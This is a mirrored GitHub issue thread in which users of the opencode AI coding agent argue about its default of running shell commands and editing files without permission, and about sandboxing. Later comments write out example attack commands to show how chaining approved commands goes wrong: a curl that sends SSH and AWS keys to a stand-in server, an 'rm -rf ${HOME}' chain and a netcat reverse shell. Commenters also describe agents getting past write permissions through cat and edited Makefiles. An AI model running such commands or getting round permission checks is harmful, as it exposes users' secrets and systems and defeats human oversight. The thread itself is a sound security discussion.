v0.10.0
v0.9.11
v0.9.10
v0.9.9
v0.9.8
v0.9.7
v0.9.6
v0.9.5
v0.9.4
v0.9.3
v0.9.2
v0.9.1
v0.9.0
v0.8.0
v0.0.0-202509130959
v0.0.0-202509130953
v0.0.0-202509130949
v0.7.9
v0.7.8
v0.7.7
v0.7.6
v0.7.5
v0.7.4
v0.7.3
v0.7.2
v0.7.1
v0.7.0
v0.6.10
v0.6.9
v0.6.8
v0.6.7
v0.6.6
v0.6.5
v0.6.4
v0.6.3
v0.6.2
v0.6.1
v0.6.0
v0.0.0-202509010531
v0.0.0-202509010020
v0.5.29
v0.5.28
v0.5.27
v0.5.26
v0.5.25
v0.5.24
v0.5.23
v0.5.18
v0.5.15
v0.5.13
v0.5.12
v0.5.11
v0.5.10
v0.5.9
v0.5.8
v0.5.7
v0.5.6
github-v1.0.5
v0.5.5
v0.5.4
v0.5.3
v0.5.2
v0.5.1
v0.4.45
v0.4.44
v0.4.43
v0.4.42
v0.4.41
v0.4.40
v0.4.37
v0.4.36
v0.4.34
v0.4.29
v0.4.28
v0.4.27
v0.4.26
v0.4.25
v0.4.24
v0.4.23
v0.4.22
v0.4.21
v0.4.20
v0.4.19
v0.4.18
v0.4.17
v0.4.16
v0.4.15
v0.4.14
v0.4.13
v0.4.12
v0.4.11
v0.4.10
v0.4.6
v0.4.4
v0.4.5
v0.4.3
v0.4.2
v0.4.1
v0.4.0
v0.3.133
v0.3.132
v0.3.131
v0.3.130
v0.3.129
v0.3.128
v0.3.127
v0.3.126
v0.3.124
v0.3.123
v0.0.0-202508031658
v0.0.0-202508031655
v0.0.0-202508031652
v0.0.0-202508031649
v0.0.0-202508031638
v0.0.0-202508031634
v0.0.0-202508031629
v0.3.122
v0.3.121
v0.3.120
v0.3.119
v0.3.118
v0.3.117
v0.3.116
v0.3.115
v0.3.114
v0.0.0-202508022246
v0.0.0-202508022229
v0.0.0-202508022228
v0.0.0-202508022056
v0.0.0-202508022055
v0.0.0-202508022053
v0.3.113
v0.3.112
v0.3.111
v0.3.110
v0.3.109
v0.3.108
v0.3.107
v0.3.106
v0.3.105
v0.3.104
v0.3.103
vscode-v0.0.8
vscode-v0.0.9
v0.3.102
v0.3.101
v0.3.100
v0.3.93
v0.3.92
v0.3.90
v0.3.88
v0.0.0-202507310417
v0.3.87
v0.3.86
v0.3.85
v0.3.84
v0.3.83
v0.3.82
v0.3.81
v0.3.80
vscode-v0.0.7
v0.3.79
v0.3.78
v0.3.77
v0.3.76
v0.3.75
github-v1.0.4
github-v1.0.3
v0.3.74
v0.3.72
v0.3.73
v0.3.71
v0.3.70
v0.3.69
v0.3.68
v0.3.67
v0.3.66
v0.3.65
v0.3.64
v0.3.63
v0.3.62
v0.3.61
v0.3.60
v0.3.59
v0.3.58
v0.3.57
v0.3.56
vscode-v0.0.6
v0.3.55
vscode-v0.0.5
v0.3.54
v0.3.53
v0.3.52
v0.3.51
v0.3.50
v0.3.49
v0.3.48
v0.3.47
v0.3.46
v0.3.45
v0.3.44
vscode-v0.0.4
github-v1
vscode-v0.0.3
github-v1.0.2
github-v1.0.1
github-v1.0.0
vscode-v0.0.2
v0.3.43
v0.3.41
v0.3.42
v0.3.40
v0.3.39
v0.3.38
v0.3.37
v0.3.36
v0.3.35
v0.3.34
v0.3.33
v0.3.32
v0.3.31
v0.3.30
v0.3.29
v0.3.28
v0.3.27
v0.3.26
v0.3.25
v0.3.24
v0.3.23
v0.3.22
v0.3.21
v0.3.20
v0.3.19
vscode-v0.0.1
v0.3.18
v0.3.17
v0.3.16
v0.3.15
v0.3.14
v0.3.13
v0.3.12
v0.3.10
v0.3.11
v0.3.9
v0.3.8
v0.3.7
v0.3.5
v0.3.6
v0.3.4
v0.3.3
v0.3.2
v0.3.1
v0.2.35
v0.3.0
v0.2.34
v0.2.33
v0.2.31
v0.2.32
v0.2.30
v0.2.28
v0.2.29
v0.2.27
v0.2.26
v0.2.25
v0.2.24
v0.2.23
v0.2.22
v0.2.21
v0.2.20
v0.2.19
v0.2.18
v0.2.17
v0.2.16
v0.2.15
v0.2.14
v0.2.13
v0.2.12
v0.2.11
v0.2.10
v0.2.9
v0.2.7
v0.2.8
v0.2.6
v0.2.5
v0.2.4
v0.2.3
v0.2.2
v0.2.1
v0.2.0
v0.1.195
v0.1.196
v0.1.194
v0.1.193
v0.1.192
v0.1.190
v0.1.191
v0.1.189
v0.1.188
v0.1.187
v0.1.186
v0.1.185
v0.1.184
v0.1.183
v0.1.182
v0.1.181
v0.1.180
v0.1.179
v0.1.178
v0.1.177
v0.1.176
v0.1.175
v0.1.174
v0.1.173
v0.1.172
v0.1.171
v0.1.170
v0.1.169
v0.1.168
v0.1.167
v0.1.166
v0.1.165
v0.1.164
v0.1.163
v0.1.162
v0.1.161
v0.1.160
v0.1.159
v0.1.158
v0.1.157
v0.1.156
v0.1.155
v0.1.154
v0.1.153
v0.1.152
v0.1.151
v0.1.150
v0.1.149
v0.1.148
v0.1.147
v0.1.146
v0.1.145
v0.1.144
v0.1.143
v0.1.142
v0.1.141
v0.1.140
v0.1.139
v0.1.138
v0.1.137
v0.1.136
v0.1.135
v0.1.133
v0.1.134
v0.1.132
v0.1.131
v0.1.130
v0.1.129
v0.1.128
v0.1.127
v0.1.126
v0.1.125
v0.1.124
v0.1.123
v0.1.122
v0.1.121
v0.1.120
v0.1.119
v0.1.118
v0.1.117
v0.1.116
v0.1.115
v0.1.114
v0.1.113
v0.1.112
v0.1.111
v0.1.110
v0.1.109
v0.1.108
v0.1.107
v0.1.106
v0.1.105
v0.1.104
v0.1.103
v0.1.101
v0.1.102
v0.1.100
v0.1.99
v0.1.98
v0.1.97
v0.1.96
v0.1.95
v0.1.94
v0.1.93
v0.1.92
v0.1.91
v0.1.90
v0.1.89
v0.1.88
v0.1.87
v0.1.86
v0.1.85
v0.1.84
v0.1.83
v0.1.82
v0.1.81
v0.1.80
v0.1.79
v0.1.78
v0.1.77
v0.1.76
v0.1.75
v0.1.74
v0.1.73
v0.1.72
v0.1.71
v0.1.70
v0.1.69
v0.1.68
v0.1.67
v0.1.66
v0.1.65
v0.1.64
v0.1.63
v0.1.62
v0.1.61
v0.1.60
v0.1.59
v0.1.58
v0.1.57
v0.1.56
v0.1.55
v0.1.54
v0.1.53
v0.1.52
v0.1.51
v0.1.50
v0.1.49
v0.1.48
v0.1.47
v0.1.46
v0.1.45
v0.1.44
v0.1.43
v0.1.42
v0.1.41
v0.1.40
v0.1.39
v0.1.38
v0.1.37
v0.1.36
v0.1.35
v0.1.34
v0.1.33
v0.1.32
v0.1.31
v0.1.30
v0.1.29
v0.1.28
v0.1.27
v0.1.26
v0.1.24
v0.1.25
v0.1.23
v0.1.22
v0.1.21
v0.1.20
v0.1.19
v0.1.18
v0.1.17
v0.1.16
v0.1.15
v0.1.14
v0.1.13
v0.1.12
v0.1.11
v0.1.10
v0.1.9
v0.1.6
v0.1.7
v0.1.8
v0.1.5
v0.1.4
v0.1.3
v0.1.2
v0.1.1
v0.1.0-beta3
v0.1.0-beta2
v0.1.0-beta1
v0.1.0
v0.0.55
v0.0.54
v0.0.53
v0.0.52
v0.0.51
v0.0.50
v0.0.49
v0.0.48
v0.0.46
v0.0.45
v0.0.47
0.0.47
0.0.46
0.0.45
v0.0.44
v0.0.43
v0.0.42
v0.0.41
v0.0.40
v0.0.39
v0.0.38
v0.0.37
v0.0.36
v0.0.35
v0.0.34
v0.0.33
v0.0.32
v0.0.31
v0.0.30
v0.0.29
v0.0.28
v0.0.27
v0.0.26
v0.0.25
v0.0.24
v0.0.22
v0.0.21
v0.0.20
v0.0.19
v0.0.18
v0.0.17
v0.0.16
v0.0.15
v0.0.14
v0.0.13
v0.0.10
v0.0.9
v0.0.8
v0.0.7
v0.0.6
v0.0.3
v0.0.4
v0.0.5
v0.0.2
v0.0.1
No Label
Milestone
No items
No Milestone
Projects
Clear projects
No project
Notifications
Due Date
No due date set.
Dependencies
No dependencies set.
Reference: anomalyco/opencode#169
Reference in New Issue
Block a user
Blocking a user prevents them from interacting with repositories, such as opening or commenting on pull requests or issues. Learn more about blocking a user.
Delete Branch "%!s()"
Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?
Originally created by @Keyruu on GitHub (Jun 20, 2025).
Originally assigned to: @adamdotdevin on GitHub.
Before the rewrite every edit and tool had to be authorized by the user, which I quite liked. Is there no such option anymore?
@lieblius commented on GitHub (Jun 27, 2025):
I understand the discussion in #9, but yeah having no permissions at all is the only thing holding me back from using this tool at the moment. With claude code I can currently scope things down how I like pretty granularly, but even their permission logic is limited and vulnerable. To provide some examples (outside of things like
|,&, etc.), I would like to be able to run commands likekubectl get, but notkubectl get secrets, orfind . -name "*.log", but notfind . -name "*.log" -exec rm {} \;. I think it is an unreasonable ask to attempt covering all edge cases, as script args semantics are arbitrary, but it might be nice to provide users a complete regex based solution that they can manage on their own. If permissions are not a design goal, examples of containerization or some form of sandboxing might be nice to include in docs.@aspiers commented on GitHub (Jun 27, 2025):
Yeah when applied to command execution and tool calls, this is an absolutely essential security feature. Without fine-grained permissions you're basically forcing users to either run everything inside a sandbox (e.g. container), which can easily be impractical in some scenarios, or to blindly trust up front that it's not going to accidentally do something dangerous, or even worse, deliberately malicious (e.g. due to a malware MCP server or trojaned LLM). As @lieblius mentioned, this is not just about writing files, it's about potential execution of arbitrary commands which is a huge no-no from a security perspective. Good tools should earn trust, not assume it.
I do appreciate the desire to avoid users having to choose what's safe up front. However this is easily achieved with a default list of regexes for commonly used and safe commands, and then allowing users to modify that list.
@bchilcott commented on GitHub (Jul 1, 2025):
This is the only blocker preventing this from being allowed in my organisation, and presumably that would be the case in many others too.
@thdxr commented on GitHub (Jul 4, 2025):
this is 100% on our list - the backend is already implemented we'll get to this next week
@adamdotdevin commented on GitHub (Jul 4, 2025):
yeah i'll get this added to tui next week, have some thoughts around how i want the ux
@GitMurf commented on GitHub (Jul 8, 2025):
So that I understand, is everything auto accept right now? or is there at least some blacklist like
rm,cdetc. that will still require permission / acceptance by the user? Claude Code has often bitten me with being overly eager and I have even had it try and mess with git by reverting to an older change which unfortunately adds additional risk to the defense of "git can protect you".Thanks for the continued great work!
@dnlbauer commented on GitHub (Jul 9, 2025):
The lack of a permission prompt for operations is what stops me from trying to use opencode over Claude code as a daily driver. The risk of unintended and destructive changes to the project or even the system is just too high for me.
@mhsdef commented on GitHub (Jul 9, 2025):
On OSX, if not a big lift, maybe we could use some Seatbelt policies a la Gemini CLI too?
@lieblius commented on GitHub (Jul 10, 2025):
@adamdotdevin Just checking, the concept of modes in its current implementation is not the final solution for this specific issue right? What is shipped looks great, but just wanted to confirm some sort of fine grained configuration within the bash tool is planned, or some other solution that removes the need for it in the first place.
@jayair commented on GitHub (Jul 11, 2025):
Yeah modes wasn't meant to address permissions.
@Keyruu commented on GitHub (Jul 16, 2025):
I really think permissions will put this on top of the AI coding agents. With this present it would enable editor integration (#216) and to approve changes in Neovim, which I thought would be a big focus of this project, because it says this in the README:
@JonBoyleCoding commented on GitHub (Jul 20, 2025):
In some respects I like that there is a lot of things opencode will just do without needing permission - but there needs to be some ability to control what it can do. The amount of times it's gone and try to run a sudo command, or launch another tui app (that I'm working on building with opencode) when it tries to test something messing up the session (usually permanently, so have to start anew).
@peloemlyn commented on GitHub (Jul 23, 2025):
This is the main thing holding me back from using opencode as my main tool. The way I would use it is to allow any non destructive tool calls but confirm any destructive ones. I think the way Claude Code does it is fine. I'm not sure if Claude Code's permissions are on a "command" basis or if you can get granular with approving command with specific parameters. I feel like anything would be better than nothing, but some matching system to approve commands with parameters seems like it would be needed to offer the most flexible experience given that some tools tend to do many different things.
@JonBoyleCoding commented on GitHub (Jul 23, 2025):
With Claude code you can do some filtering for allow/blocking. It understands * as a wildcard at the very least.
@alanxoc3 commented on GitHub (Jul 23, 2025):
Bump! This is my biggest concern to using opencode. I currently put this in my config file, which turns off "task" and "bash" as those are currently both the tools that can execute scripts from how I understand it. But I'd love to whitelist commands that can be run. Or maybe setting up a devcontainer is the correct way to approach this, that would be a massive headache however.
Or even prompting me everytime it wants to run an external command would be great.
@Mic92 commented on GitHub (Jul 31, 2025):
https://github.com/sst/opencode/commit/5500698734c5119ccd7b0d9ab504bb3a53e5e39d something is happening on the implementation side.
@adamdotdevin commented on GitHub (Jul 31, 2025):
shipping today, going to consolidate all issues into this one to keep the conversation in one place and gather feedback on the implementation
@michelesr commented on GitHub (Aug 7, 2025):
Is this implemented? I'm running
v0.3.133and I asked to remove a file and it just ranrmwithout confirmation.@rekram1-node commented on GitHub (Aug 7, 2025):
see docs here:
You can enable stricter permissions in your opencode.json
@michelesr commented on GitHub (Aug 7, 2025):
Thanks, that worked. However I wonder whether the default should be a safer
askfor botheditandbash?@rekram1-node commented on GitHub (Aug 7, 2025):
The allow all is very intentional, I remember the core team stating as much multiple times so you probably won't sway them there haha
@nikhilmaddirala commented on GitHub (Aug 8, 2025):
When you set the permission to "ask" it's really difficult to reject the proposal. When you press escape it just continues with the same proposal again. When you press escape twice and give a new instruction it seems to get confused and often retries the same proposal again. Can we make it behave more like Claude code where escape = tell the agent what to do differently?
@zatevakhin commented on GitHub (Aug 9, 2025):
often have same issue as @nikhilmaddirala. for example in Avante on rejection i can point the reason of rejection to the agent, and it works quite well. will be nice to have configurable rejection behavior like stop agent immediately or provide reason, and each user can pick for themselves how to use it.
@rekram1-node commented on GitHub (Aug 9, 2025):
@zatevakhin @nikhilmaddirala this will be addressed once this is merged: #1747
@michelesr commented on GitHub (Aug 13, 2025):
Latest release v0.4.41 is not asking any permission before running commands or editing files, I have:
Edit: I can see #1876 is open.
@ViggoV commented on GitHub (Aug 25, 2025):
Have the same (unacceptable) issue as @michelesr
The bash permission is simply not respected, which is completely insane in my book. Kudos on a supercool project, but I simply can't have it my computer if I can't constrain it reliably
@rekram1-node commented on GitHub (Aug 25, 2025):
@ViggoV are you on latest? do you have any custom agent configurations?
@ViggoV commented on GitHub (Aug 25, 2025):
Yes, installed today via homebrew. Completely out-of-the-box. I specified
But the agent ran a
git diffcommand without asking (and despite me specifying it should usejj, but that's beside the point)In any case, I do not at all feel confident that OpenCode's security measures are sufficient and I very much disagree with the reckless full-permissions-by-default policy, so I will delete it and probably never touch it again.
@k3d3 commented on GitHub (Aug 25, 2025):
I haven't had any issues with this functionality - I'm on master. You might need to install it outside of homebrew, as the functionality is very new.
Also, "completely insane in my book" feels a bit harsh, especially for a feature that's already been implemented.
@ViggoV commented on GitHub (Aug 25, 2025):
Sorry for that phrasing
@rubslopes commented on GitHub (Sep 2, 2025):
I'm on v.0.6.3 and it's not asking for any permission. It just executes.
Is it possible to reopen this ticket?
@rekram1-node commented on GitHub (Sep 2, 2025):
@rubslopes which agent are you using? Build has no permissions by default
@rubslopes commented on GitHub (Sep 2, 2025):
@rekram1-node Claude Sonnet 4 provided by Github Copilot LM API. I have no
config.jsonfile.@rubslopes commented on GitHub (Sep 2, 2025):
@rekram1-node Here's a quick example: https://opencode.ai/s/ivvW5Wvn
@rekram1-node commented on GitHub (Sep 2, 2025):
@rubslopes like I said, build agent/mode has no permissions by default so unless you have custom settings for permissions or you are using plan agent, this is expected behavior
@rekram1-node commented on GitHub (Sep 2, 2025):
just for reference, this is what I mean by agent^ pardon the terrible drawing
@rubslopes commented on GitHub (Sep 2, 2025):
Oh, I think I get it now. When you said "has no permissions by default" you meant "no permissions control", right?
I did a new test: using plan mode, and then build mode with a config file defining
"edit": "ask", "bash": "ask". It worked as expected, it asked for permissions both times.Thanks @rekram1-node !
@rgaufman commented on GitHub (Sep 9, 2025):
This is insane, so by default, if you ask it a question, it can go in and start editing files willy nilly? - this seems insane to me... I guess I'll keep using claude cli. Woah though.
@eddienubes commented on GitHub (Oct 15, 2025):
Hi guys 👋, I really appreciate the time and effort you've put into the tool!
Nevertheless, default permission handling breaks the fundamental approach to access management.
In all the tools, software and cloud providers I've used, the principle of "Least Privilege" is paramount.
Someone installing
opencodefor the first time and running a test prompt is vulnerable to LLM's malicious choices.Especially in the light of the recent paper - https://www.anthropic.com/research/small-samples-poison.
For some reason, installing a
.dmgon my mac doesn't mean the app will be able to scan my entire system and do whatever it wants with it before I provide explicit disk access, therefore whyopencodeshould?UPD: Let me know if there's an issue discussing default permissions behaviour, I'll move the message over there.
@rekram1-node commented on GitHub (Oct 15, 2025):
the team has thought about this a lot and it came up several times but they feel that the ux is best without permissions, most people end up disabling them
i was thinking there should probably be a way to startup opencode in a “safe” mode because the default lack of permissions can be a deal breaker for some
@eddienubes commented on GitHub (Oct 15, 2025):
There could be an option to select permission "mode" upon the first start-up which explicitly warns users about consequences.
@rekram1-node commented on GitHub (Oct 15, 2025):
good idea
@pakar commented on GitHub (Nov 28, 2025):
As a temporary bandaid for this i made a simple drop-in bubblewrap script. It is not perfect, but it severely limits the amount of bad things opencode might cause.
https://github.com/pakar/bubblewrap_opencode
@aspiers commented on GitHub (Dec 12, 2025):
I'm not sure what the status quo is for new users since I've already carefully configured the opencode permissions on my machines, but this worries me:
I very strongly recommend against this way of thinking. Software MUST be secure by default, otherwise you are needlessly putting your users at risk. Don't get me wrong, I'm totally supportive of giving users the choice to turn off the safety checks, assume responsibility for the risks, and then potentially shoot themselves in the foot. Indeed sometimes intentionally disabling checks is the right thing to do (e.g. when running in a VM, container, or other sandbox). But by default? Please don't!!
It was only 5 hours since I saw the last example of why this is so important:
https://youtu.be/S4oO27tXVyE?si=CceEtEkCdrUcNib3
but there are countless other examples.
No, default lack of permissions should be a deal breaker for ALL. Please. Respect the safety of your users. This has been industry-wide best practice for decades at this point. Sorry for the rant but this is important and I don't want this great project to get bitten by the next big AI security incident.
@rekram1-node commented on GitHub (Dec 12, 2025):
@aspiers Dax is reworking the defaults / permissions and I think you'll be happier w/ it
should ship soon
@aspiers commented on GitHub (Dec 12, 2025):
Excellent thanks so much @rekram1-node and Dax!
@DragonDev1906 commented on GitHub (Dec 15, 2025):
Short answer: Terribly insecure.
On literally the first prompt I did, it created a python file in the current directory and ran it (no questions asked). I ended up running in plan mode until I found out how to disable that behavior.
Here are some things it can do by default:
If you ask me: The first time any of these are tried to be used the user should be asked how many permissions he wants to give.
As for the config itself: There is no way to configure
askordenyfor all tools added in the future. Given insecure defaults I really don't want new versions to come with a potential "here is another way to execute code" tool.@rgaufman commented on GitHub (Dec 15, 2025):
Totally, this tool should come with a giant warning and in my opinion nobody should use this tool for anything period. I uninstalled it and switched to Claude Cli and VS plugins like Roo Code.
Even if this is eventually addressed, personally I have no faith in any team that would think this kind of default is sensible past, present or future.
@pakar commented on GitHub (Dec 15, 2025):
@DragonDev1906 @rgaufman This is a general problem with basically all agentic coders out there today, and this is a yet to be solved in all of them. If it can execute any command they are dangerous. Heck, i have seen claude use "cat" to bypass write-permissions to update a script it had execute-permissions on and then execute what it wanted, not what i allowed it to do.
If you run any agentic coder at the moment i would severely restrict it from what it can access. I wrote this bubblewrap helper for this specific purpose. https://github.com/pakar/bubblewrap_opencode As long as i don't have any sensitive data within the project-folder i can let it do whatever from within there, especially when networking is disabled for it.
@DragonDev1906 commented on GitHub (Dec 15, 2025):
They likely all have that problem, yes. But I'd expect that at least the open source project (which is not bound to a single provider) would try its best and not ship with absolutely no protections (by default).
Ignoring the fact that many let the AI write source code files that are run by the AI or by yourself (often without reviewing them first): The complete lack of of basic protection is in my opinion not acceptable. 1
I don't know bubblewrap in detail, but unless I'm mistaken your script does not prevent:
cat /etc/passwd~/go/bin, which may then get executed from the hostI'm not trying to suggest running it normally 2 (though sometimes you want it to be able to inspect parts of your system), but I'm trying to show that even this is error prone and problematic with the default settings.
With a proper implementation that asks the user for confirmation the first time a specific command is run you wouldn't get the
"cat" to bypass write permissionsproblem unless the user doesn't read/review what he approves. Unless I'm mistaken that functionality for commands already exists and just isn't the default.This one is especially hard, since you would need to choose between "can write files" and "can execute
go runand similar commands" ↩︎Personally, I'm a fan of seggregation using VMs, if only it where more convenient to setup/+use. ↩︎
@rgaufman commented on GitHub (Dec 15, 2025):
That's just not true. By default, any time Claude tries to run cat outside of the project repo, it prompts. Any time it tries to pipe anything to cat, it prompts. Any time it tries to add a new command I didn't explicitly whitelist with what params I'm happy with, it prompts. This is by default. Even when I explicitly ask it to run cat something outside of the current repo, it prompts.
What you end up doing is creating some wrapper commands, like I have a git hook that even if I allow a commit, it will reject it unless Claude audited the full git diff when considering a commit message. It will also die if all specs didn't pass for example. This is even if it prompts and I make a mistake and say yes Claude, go ahead.
OpenCode has none of these safeguards, it's like a car without brakes, I honestly think it's one of the worst tools on the Internet right now and I wish it was deleted until it could be rewritten from scratch to be fixed not to work in this way. Just my opinion.
@pakar commented on GitHub (Dec 15, 2025):
@DragonDev1906 The wrapper-script is not a "this will fix everything". It's a wrapper you should adjust for your needs with a default-config that should be fairly safe for most ordinary users. It's main use-case it not to protect against bad actors but to prevent LLM's from working around the permissions it has been given.
Have done a few things, but not pushed anything, where i now just add the required files from /etc for my needs. But /etc/passwd is just a list of usernames and does not contain password-hashes. $HOME is a lot worse to expose over /etc/
~/go/bin is an issue, but it seems this, for now, takes too many steps for a llm to figure out. I also do not have ~/go/bin setup in my path outside the container. But if that was fixed it could still inject code into unit-test's and be allowed to execute via "go test", or it could inject bad code into the actual application and have you run it outside the container. This is still not a big issue when you limit what it is allowed to access and you do review what code it has written.
Still i should probably create a dedicated ~/go folder for this container just to reduce the potential risk.
You can configure bubblewrap for your needs. Either allow it network-access or not, but for a LLM to figure out that it can do a portscan to find out what services you have exposed on localhost and then exploit them is a hard reach, unless you are working against a bad actor. If that's the case you will have larger issues reviewing code for malicious code injections, and those can be very hard to spot.
If you really want to lock it down you could use slirp4netns for network-separation and remove all localhost-access and control what it's allowed to talk to. The same issues exists in claude and other agentic coders. If they write code to do something or use existing commands it still exposes the same issue.
Asking a user for permissions for every command is problematic in multiple ways. If you ask for each full command every time people will stop reading and just approve or approve after a quick glance. If you set up generic approvals for commands like "cat *" those commands may be abused in the future, either by themselves or when chained together.
Example: if you previously allowed curl, cat and base64 to make test-calls against an local API it was writing it can now start doing things such as "curl --request POST --data 'data=$(cat ../../../../../${HOME}/.ssh/id_rsa|base64)' https://some-remote-bad-server.com/receiver' or "curl --data 'data=${AWS_ACCESS_KEY_ID}' https://some-remote-bad-server.com/receiver"
Each approval by itself may seem benign but how they are used can become a issue.
@rgaufman
I have myself seen Clause modify build-scripts and Makefiles and then execute things from there, all without asking the user for permission to run those commands because building the code was already approved.
New issues pop up all the time.
https://www.cvedetails.com/vulnerability-list/vendor_id-38130/product_id-182873/Anthropic-Claude-Code.html
Or why not the issue where it was free to access ../../../../../../home/my_user/.ssh/id_rsa that was outside the project-folder? This was just a couple of month's ago, and even if that specific thing is fixed there will be more.
or maybe have a look at:
https://www.cryptologie.net/posts/weaponizing-ai-assistants-with-their-permission/
Sure claude is more polished and have started working towards something a bit safer, but it still has a long way to go.
Whatever agentic coder you are using you should be running it in a container because they all have issues, some known and some unknown. If that container is a minimal bubblewrap container, docker or full VM is up to you.
I do hope opencode can get a bit better at safety/security. I also don't like that the defaults that are set to allow for bash, read and write. IMO the defaults should be ask for everything until the user have created a configuration. In the future i would even like to have per folder-permissions within a project per agent/task. But even with better/more fine-grained permissions i would still not let it execute things outside a container, nor would i run claude or any other agentic coder outside a container.
@rgaufman commented on GitHub (Dec 15, 2025):
You saw Claude do this without asking for confirmation? - are you sure you didn't at one point tell it to always allow?
Users disabling the gun safety anyway doesn't mean you remove the gun safety. My problem is OpenCode removes the gun safety not just by default, but it was built in mind NOT to have gun safety as a core design philosophy and no way to add gun safety back in any meaningful/useful way.
I've been running Claude in 6 terminal tabs simultaneously, all sharing the same code and OS, without any VMs, running specs on the same mongo / postgres / memcache / redis / etc processes locally, just with different name spaces that are auto configured from the Claude Session ID.
iTerm opens the tab that has the next prompt from Claude, which I sanity check and I have wrapper scripts that protect me from making a mistake. There are wrappers like bin/rspec_claude bin/git_review_claude, etc which are auto ran when Claude tries to run rspec or git, etc (I am still prompted, the wrappers are to protect me from making a mistake). The rest is exclusively the built-in tools for reading, editing, etc. No sed or anything like that, even when it does "| head", that's blocked because head/tail often hide actual problems. Once blocked with exit 1, Claude automatically retries with a safe command without me needing to prompt it at all (and Claude is very smart about this, if a command is used with new arguments, or with a path outside of your project, it always prompts again).
Looking at your links:
cryptologie.net/posts/weaponizing-ai-assistants-with-their-permission -- This talks about passing --dangerously-skip-permissions to Claude!! - If OpenCode required you to pass --dangerously-skip-permissions to enable its current default behaviour, that would be fantastic!
cvedetails.com/vulnerability-list/vendor_id-38130/product_id-182873/Anthropic-Claude-Code.html - looking at this list, it's great they are taking this stuff seriously, unlike OpenCode, but specifically the top 5 issues:
Agreed. But even if/when this is done, I think the current state and pushback to doing this have tarnished the trust in this project and team forever. I don't see how I could trust OpenCode for anything now or in the future with quotes like this from the dev team: "the team has thought about this a lot and it came up several times but they feel that the ux is best without permissions, most people end up disabling them" < this just reads as pure insanity to me.
@pakar commented on GitHub (Dec 16, 2025):
I'm only making this final reply to this as the previous comment has a bunch of misconceptions and lacks understanding of the issues agentic coders have in general.
@rgaufman I do suggest that you actually read what i wrote instead of making assumptions. You just made a bunch of incorrect statements and assumptions of things i actually explained and referenced.
Yes, i have seen claude perform operations i did not allow. Claude CLI have had big issues with command chaining.
https://www.cryptologie.net/posts/weaponizing-ai-assistants-with-their-permission/
This mentions "--dangerously-skip-permissions" once, and this was not used during their testing.
This is the quote from after they allowed the cat the command to run, all without "--dangerously-skip-permissions"
This means that if you allowed it to run "diff" or any other command without asking it can then use that to execute any command by chaining them. As it starts with "diff" the following would be "diff file1.txt file2.txt && rm -rf ${HOME}"
Since you allowed your sed-wrapper this can be exploited. This would be fine for claude to execute: 'sed asdf |nc 1.2.3.4 5555 -e /bin/bash' and a malicious LLM provider would be free to do whatever on your system via that reverse-shell. Basically anything that can inject things into the context can cause things like this to happen.
Even if some things get patched there will be more.
If they took security seriously they could have used LD_PRELOAD and injected a function into each child-process that could have done permission-checking without doing string-comparisons. Another option could have been to have wrappers for all commands it could execute and have those wrappers run a check against what has been allowed and that may have prevented the chaining issue to a degree.
CVE details:
This was a example of published exploits. CVE's have nothing to do with someone taking security seriously. A CVE can be filed without anyone from a project taking any action, even if claude do seem to act on most reported issues.
You cannot just take a few of the reported issues from this any make any determination. What is disturbing is that they have 8(!!) reported issues with a rating of >9 in the last few months. This is a indication that the project have not taken security seriously and are now trying to fix things as they pop up.
Symlink-checking. This is in relation to being able to access files outside the project, like being able to access /etc/passwd by opening ../../../../etc/passwd instead of /etc/passwd, not just your own created symlinks.
Adding untrusted things into the context-window is as easy as getting a user to clone a opensource repo and running things against it. That is a very low threshold and something i myself do to from time to time to get a quick overview of a project with poor documentation. Most people don't just use these things on their own repos.
And yes, opencode does have it's issues, some quite severe, but so do all agentic coders and that is something you seem to refuse to understand. If you run ANY agentic coder you should do it in a container, because none of them are safe.
I don't like the opencode statement they made about not having better security defaults, but this is also a quite young opensource project. If you don't like something then make a PR with better handling of default-security.
@rgaufman commented on GitHub (Dec 16, 2025):
Maybe before my time then, it seems they have fixed it. I don't see them saying it is intentional by design in any case.
I think we're talking past each other, does it or does it not ask to run cat?
If you always allow cat (or rm, or sudo, or whatever), that's on you, but if it's allowed by default, that's an issue. Sure, awareness of the tools and how they can be exploited is important, no argument.
With that said, Claude and Roo code and many others have tools to "read" safely, so the first thing you should do is simply respond "no" to cat and black list it and let it use the built in safer tools.
I am sure OpenCode is not the only tool with security problems. But no Gemini cli dev is saying it's a conscious design decision. I'm guessing they fixed it by now?
That's not possible in Claude or Roo code, it will prompt for new chained commands. Try it, even ask it to run that, it won't even if diff is always allowed. Rm should never be always allowed (it is in OpenCode by default).
Again that's not possible, it handles chained commands and it does prompt. I just asked it to do this even though my wrapper is always allowed and it prompted, I selected "yes" anyway to stress test this, and it died with a prompt to Claude to never chain with this wrapper. This specifically is my own chain handling though, the defaults just prompt and let you override - but I like to err on safety and I don't mind Claude adding extra steps but never chaining my wrappers.
The things patched are not real problems if you are working on your own code base, only if you're executing inside of untrusted code bases. Then yes you should take caution.
And you should have backups and an easy way to restore and a good understanding of the tools involved That's not to say it will ever be 100% safe, but it's safe enough in your code base and removes a lot of friction.
There are many built in tools so you don't have to rely on external commands nearly as much. It's also easy to make it use wrappers safely enough and block chaining anything you don't explicitly trust.
The built in web search, edit, read, safe execution of explicitly allowed wrappers like say bin/assets compile, etc is safe enough, piping is blocked, paths outside of the code base are blocked, and the defaults are sensible.
Have you actually read any of them rated >9? I explained in the previous message why they are not an issue in your own code base. In fact they ask if you trust the code base and then go into read only mode by default if you don't. If you say you trust the code base, again, that's on you.
But the main thrust of what I'm saying is even with untrusted code bases the focus is to add safeguards, not to say it is a design choice.
No, it can't read symlinks outside of your code base without explicit permission, the symlink must live inside of your code base - and even then, they decided to err on the side of safety and not allow this.
For example I symlink shared docs and wrappers to multiple code basis and I had to explicitly allow it to read the path in each code base because it's outside of the immediate repo.
It's equally easy to copy paste "sudo rm -Rf /" - you're making a straw man. Just because it can execute code in a malicious repo that you've explicitly marked as "trusted", that's in no way equivalent to what OpenCode does by default.
Ok then we agree on the primary point I'm making. Clearly the dev team disagree with us both, which is their right. But if this is a conscious design choice for it to work like this, then what good is a PR that goes against their code philosophy?
@pakar commented on GitHub (Dec 16, 2025):
@rgaufman Just stop.
You are still ignoring, or just not understanding basic security concepts. You fail to read and understand what's written. I just read the first few sentences of your response and once again you show your ignorance and lack of understanding.
